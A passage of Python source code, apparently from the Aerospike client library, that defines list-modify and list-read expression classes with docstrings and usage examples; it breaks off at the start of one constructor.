"""Create an expression that inserts value to specified index of list."""
_op = aerospike.OP_LIST_INSERT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index for insertion, integer or integer expression.
value (TypeValue): Value or value expression to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after insert.
expr = exp.GT(
exp.ListSize(None, exp.ListInsert(None, None, 0, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsertItems(_BaseExpr):
"""Create an expression that inserts each input list item starting at specified index of list."""
_op = aerospike.OP_LIST_INSERT_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Target index where item insertion will begin, integer or integer expression.
values (TypeListValue): List or list expression of items to be inserted.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if list bin "a" has length > 5 after inserting items.
expr = exp.GT(
exp.ListSize(None, exp.ListInsertItems(None, None, 0, [4, 7], exp.ListBin("a"))),
5).compile()
"""
self._children = (
index,
values,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListIncrement(_BaseExpr):
"""Create an expression that increments list[index] by value."""
_op = aerospike.OP_LIST_INCREMENT
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): Index of value to increment.
value (TypeValue): Value or value expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if incremented value in list bin "a" is the largest in the list.
expr = exp.Eq(
exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, -1, #rank of -1 == largest element.
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a"))),
exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 1,
exp.ListIncrement(None, None, 1, 5, exp.ListBin("a")))
).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListSet(_BaseExpr):
"""Create an expression that sets item value at specified index in list."""
_op = aerospike.OP_LIST_SET
def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
index (TypeIndex): index of value to set.
value (TypeValue): value or value expression to set index in list to.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Get smallest element in list bin "a" after setting index 1 to 10.
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0,
exp.ListSet(None, None, 1, 10, exp.ListBin("a"))).compile()
"""
self._children = (
index,
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListClear(_BaseExpr):
"""Create an expression that removes all items in a list."""
_op = aerospike.OP_LIST_CLEAR
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Clear list value of list nested in list bin "a" index 1.
from aerospike_helpers import cdt_ctx
expr = exp.ListClear([cdt_ctx.cdt_ctx_list_index(1)], "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListSort(_BaseExpr):
"""Create an expression that sorts a list."""
_op = aerospike.OP_LIST_SORT
def __init__(self, ctx: TypeCTX, order: int, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
order (int): Optional flags modifiying the behavior of list_sort. This should be constructed by bitwise or'ing together values from :ref:`aerospike_list_sort_flag`.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get value of sorted list bin "a".
expr = exp.ListSort(None, aerospike.LIST_SORT_DEFAULT, "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {_Keys.LIST_ORDER_KEY: order}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValue(_BaseExpr):
"""Create an expression that removes list items identified by value."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE
def __init__(self, ctx: TypeCTX, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Value or value expression to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# See if list bin "a", with `3` removed, is equal to list bin "b".
expr = exp.Eq(exp.ListRemoveByValue(None, 3, exp.ListBin("a")), ListBin("b")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueList(_BaseExpr):
"""Create an expression that removes list items identified by values."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
values (TypeListValue): List of values or list expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements with values [1, 2, 3] from list bin "a".
expr = exp.ListRemoveByValueList(None, [1, 2, 3], exp.ListBin("a")).compile()
"""
self._children = (
values,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRange(_BaseExpr):
""" Create an expression that removes list items identified by value range
(begin inclusive, end exclusive). If begin is None, the range is less than end.
If end is None, the range is greater than or equal to begin.
"""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_RANGE
def __init__(self, ctx: TypeCTX, begin: TypeValue, end: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
begin (TypeValue): Begin value or value expression for range.
end (TypeValue): End value or value expression for range.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove list of items with values >= 3 and < 7 from list bin "a".
expr = exp.ListRemoveByValueRange(None, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
begin,
end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankToEnd(_BaseExpr):
"""Create an expression that removes list items nearest to value and greater by relative rank."""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements larger than 4 by relative rank in list bin "a".
expr = exp.ListRemoveByValueRelRankToEnd(None, 4, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankRange(_BaseExpr):
""" Create an expression that removes list items nearest to value and greater by relative rank with a
count limit.
"""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
count (TypeCount): How many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# After removing the 3 elements larger than 4 by relative rank, does list bin "a" include 9?.
expr = exp.GT(
exp.ListGetByValue(None, aerospike.LIST_RETURN_COUNT, 9,
exp.ListRemoveByValueRelRankRange(None, 4, 1, 0, exp.ListBin("a"))),
0).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndex(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Index integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3 has been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndex(None, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified index to the end of list."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove all elements starting from index 3 in list bin "a".
expr = exp.ListRemoveByIndexRangeToEnd(None, 3, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
count (TypeCount): Integer or integer expression, how many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3, 4, and 5 have been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndexRange(None, 3, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRank(_BaseExpr):
"""Create an expression that removes list item identified by rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove smallest value in list bin "a".
expr = exp.ListRemoveByRank(None, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified rank to the last ranked item."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 2 largest elements from List bin "a".
expr = exp.ListRemoveByRankRangeToEnd(None, -2, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
count (TypeCount): Count integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 3 smallest items from list bin "a".
expr = exp.ListRemoveByRankRange(None, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
#######################
# List Read Expressions
#######################
class ListSize(_BaseExpr):
"""Create an expression that returns list size."""
_op = aerospike.OP_LIST_SIZE
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Integer expression.
Example::
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValue(_BaseExpr):
""" Create an expression that selects list items identified by value and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or value expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the index of the element with value, 3, in list bin "a".
expr = exp.ListGetByValue(None, aerospike.LIST_RETURN_INDEX, 3, exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRange(_BaseExpr):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANGE
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_begin: TypeValue,
value_end: TypeValue,
bin: TypeBinName
):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_begin (TypeValue): Value or value expression of first element to get.
value_end (TypeValue): Value or value expression of ending element.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get rank of values between 3 (inclusive) and 7 (exclusive) in list bin "a".
expr = exp.ListGetByValueRange(None, aerospike.LIST_RETURN_RANK, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
value_begin,
value_end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueList(_BaseExpr):
""" Create an expression that selects list items identified by values and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeListValue): List or list expression of values of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
#Get the indexes of the the elements in list bin "a" with values [3, 6, 12].
expr = exp.ListGetByValueList(None, aerospike.LIST_RETURN_INDEX, [3, 6, 12], exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRangeToEnd(_BaseExpr):
"""Create an expression that selects list items nearest to value and greater by relative rank"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the values of all elements in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 3, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRange(_BaseExpr):
""" Create an expression that selects list items nearest to value and greater by relative rank with a
count limit and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
count (TypeCount): Integer value or integer value expression, how many elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the next 2 values in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRange(None, aerospike.LIST_RETURN_VALUE, 3, 1, 2, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndex(_BaseExpr):
""" Create an expression that selects list item identified by index
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_type: int,
index: TypeIndex,
bin: TypeBinName,
):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values
value_type (int): The value type that will be returned by this expression (ResultType).
index (TypeIndex): Integer or integer expression of index to get element at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the value at index 0 in list bin "a". (assume this value is an integer)
expr = exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRangeToEnd(_BaseExpr):
""" Create an expression that selects list items starting at specified index to the end of list
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
index (TypeIndex): Integer or integer expression of index to start getting elements at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get element 5 to end from list bin "a".
expr = exp.ListGetByIndexRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 5, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRange(_BaseExpr):
""" Create an expression that selects "count" list items starting at specified index
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
index (TypeIndex): Integer or integer expression of index to start getting elements at.
count (TypeCount): Integer or integer expression for count of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get elements at indexes 3, 4, 5, 6 in list bin "a".
expr = exp.ListGetByIndexRange(None, aerospike.LIST_RETURN_VALUE, 3, 4, exp.ListBin("a")).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRank(_BaseExpr):
""" Create an expression that selects list item identified by rank
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_type: int,
rank: TypeRank,
bin: TypeBinName,
):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_type (int): The value type that will be returned by this expression (ResultType).
rank (TypeRank): Rank integer or integer expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the smallest element in list bin "a".
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, aerospike.ResultType.INTEGER, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRankRangeToEnd(_BaseExpr):
""" Create an expression that selects list items starting at specified rank to the last ranked item
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
rank (TypeRank): Rank integer or integer expression of first element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the three largest elements in list bin "a".
expr = exp.ListGetByRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, -3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRankRange(_BaseExpr):
""" Create an expression that selects "count" list items starting at specified rank
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, count: TypeCount, bin: TypeBinName):
